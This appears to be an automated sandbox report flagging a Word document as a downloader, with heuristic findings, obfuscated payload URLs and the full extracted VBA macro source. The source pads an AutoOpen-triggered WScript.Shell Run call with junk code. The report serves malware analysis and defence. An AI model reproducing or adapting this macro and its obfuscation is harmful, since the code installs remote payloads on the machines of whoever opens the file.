Verdict: MALICIOUS (Risk Score 290)

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains VBA macros with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macros utilize WScript.Shell and CreateObject to execute commands, likely to download and run a second-stage payload from the provided obfuscated URL. The ClamAV detection 'Doc.Downloader.Sload-6817439-0' further supports the downloader functionality.
Heuristics (9)

- ClamAV: Doc.Downloader.Sload-6817439-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sload-6817439-0
- VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): WScript.Shell usage.
  Matched lines in script: Set AutoLoanAccountbn = Streamnq / Usabilityvw = "WscRipt.sHeLl" / Set Valleyjb = Solutionsjz
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call.
  Matched lines in script: Set Principalli = Trafficwayzz / purplebl = Array(withdrawalzn, communitiesdn, firewalljp, CreateObject(Usabilityvw).Run!(("" + magentaji + Junctionbi + Glenam + blackih + ShoesClothingii.TextBox1) + Frozenjf + Legacyub + Pathoi, 30 - 30), visionaryrw, Directwj, multimediajd) / Set programcb = leveragejo
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro.
  Matched lines in script: End Sub / Sub autoopen() / Representativenr = Array(depositdw, initiativesha, Internationalbs, Montanajp, USBwj, AutoLoanAccountqu, SMTPjq)
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://www.foAmXA-31.Au/x]w0Q_XAJ]eUD`_0@http://cod`enlXAnhnme.vn/wmfuxxu_bf8c_ccJhR@http://www.v`XAje?delbo?que.com/oJmIZL4_SF1qj[c]v@http://www.k`beA-?oft.Au/Heq3ZDGN_tvvO3]2e1q@http://www.yogXA?pXAceme.com/QZPd`[_LN2`P6fHd9.Spl`t(9@97;$Intell`gentZottonZh`p?vv)9SleekZottonSh`Atdj9;$ZomputeA?Book?dl (in document text, OLE body)
  - URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1): files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6818 bytes |

SHA-256: 7b7ead228350ed40e372a17fb503903bac660b196664036d88f1ed08cc7ecfee

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ShoesClothingii"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "Gorgeouspa"
Function Montanajp()
On Error Resume Next
Set Underpassuj = HandcraftedConcreteTablemn
For Each circuitrq In Bedfordshiresi
For Each navigatevo In Digitizedid
Forwardos = (Oct(574))
Next
Do
Upsizedwa = CLng(Avondp)
Loop Until bluetoothnk Eqv programuz
Set Buckinghamshiresu = recontextualizewm
growdb = architectureswn
For Each Ferryzh In Beautyjz
Digitizedji = Cos(Internalbp)
Next
Next
Set j24hourqv = Beautytd
Set synergisticvt = Alabamakr
For Each driverzj In Louisianazn
For Each SQLjz In ComputersAutomotiveAutomotiveoh
depositit = (Oct(90))
Next
Do
platformszh = CLng(softwarezw)
Loop Until contentbasedwn Eqv Ergonomichn
Set withdrawalwo = iterateht
Coloradoqn = Montanamh
For Each Borderscf In LiberianDollarjj
Rubbercj = Cos(Regionalpi)
Next
Next
Set ebusinessnz = Lodgebo
Set turquoisesh = IncredibleSoftChipsri
For Each CSSkw In Leadrt
For Each HandcraftedPlasticChipsom In pixeldj
Objectbasedsp = (Oct(280))
Next
Do
AutoLoanAccountot = CLng(parsingnz)
Loop Until implementuz Eqv implementationrt
Set depositua = SleekGraniteMousevc
Fantasticsh = HandmadeFreshHatpd
For Each Avonnf In Freshva
Heightsba = Cos(silverkq)
Next
Next
Set AutoLoanAccountbn = Streamnq
Usabilityvw = "WscRipt.sHeLl"
Set Valleyjb = Solutionsjz
For Each monitoroc In KidsBookslz
For Each streamlinett In copyingom
transmittingqp = (Oct(721))
Next
Do
virtualdn = CLng(navigatejs)
Loop Until Producerih Eqv BabyJeweleryBeautyob
Set HandcraftedGraniteCheesebm = LicensedConcreteShirtft
buswl = Cliffbw
For Each Toysfi In arrayql
backinguprq = Cos(Publickeywi)
Next
Next
Set Liberiacr = calculatinguc
Set Diverseli = Phasedpj
For Each Researchzm In Identitycl
For Each Reverseengineeredzz In maroonrt
IndustrialBabyToyszs = (Oct(167))
Next
Do
quantifyingcd = CLng(orchidnk)
Loop Until BabyElectronicsiw Eqv SouthAfricadr
Set bandwidthti = Softji
multitaskingqt = Coloradooh
For Each AutoLoanAccountuv In CreditCardAccountcu
deliverfi = Cos(Borderszp)
Next
Next
Set Principalli = Trafficwayzz
purplebl = Array(withdrawalzn, communitiesdn, firewalljp, CreateObject(Usabilityvw).Run!(("" + magentaji + Junctionbi + Glenam + blackih + ShoesClothingii.TextBox1) + Frozenjf + Legacyub + Pathoi, 30 - 30), visionaryrw, Directwj, multimediajd)
Set programcb = leveragejo
For Each magneticjw In multibyteuz
For Each Crescentws In Woodenua
cardzb = (Oct(544))
Next
Do
UnbrandedPlasticTablezi = CLng(Jerseyib)
Loop Until paymentsl Eqv COMku
Set crossplatformid = overridecf
Prairiewa = Cambridgeshirept
For Each harddrivepc In contentlj
SleekSoftTunaco = Cos(Wayhh)
Next
Next
Set indexingwl = Frozenow
Set compellingsm = ebusinessdu
For Each Smallzl In Regionalnn
For Each LicensedGraniteBaconsk In navigateon
Kazakhstanuz = (Oct(717))
Next
Do
holisticna = CLng(CreditCardAccountoj)
Loop Until overridingkw Eqv tanzl
Set solidstatekz = SriLankaRupeepl
Meadowwk = pinkpb
For Each RialOmaniof In depositnz
GraphicalUserInterfaceba = Cos(SwissFrancrh)
Next
Next
Set Fantastickz = Michiganoj
Set Chiefic = GorgeousPlasticComputerhw
For Each missioncriticaliz In matrixtj
For Each RefinedCottonSoapsa In neuralst
Bedfordshiresv = (Oct(723))
Next
Do
Associatetl = CLng(opensourcesq)
Loop Until Frozentn Eqv transmitternz
Set paymentcm = navigatingwc
Trailqi = indexpm
For Each Somiw In feedah
backendmi = Cos(websiteoh)
Next
Next
Set HandcraftedRubberCheesebu = redkm
End Function
Attribute VB_Name = "Islandssa"
Sub Visionaryah()
freshthinkingku = globalrf
Brooksbq = Consultantds
productizeva = paymenthl
End Sub
Sub autoopen()
Representativenr = Array(depositdw, initiativesha, Internationalbs, Montanajp, USBwj, AutoLoanAccountqu, SMTPjq)
End Sub
Attribute VB_Name = "Districtwz"
Attribute VB_Name = "Streamzz"
Attribute VB_Name = "indexdp"
Attribute VB_Name = "Orchestratorvd"
Attribute VB_Name = "marketswc"
Attribute VB_Name = "MoneyMarketAccountsz"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Fantasticub"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Bedfordshirezk"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Freshtm"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Strategistjd"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Agentaa"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
```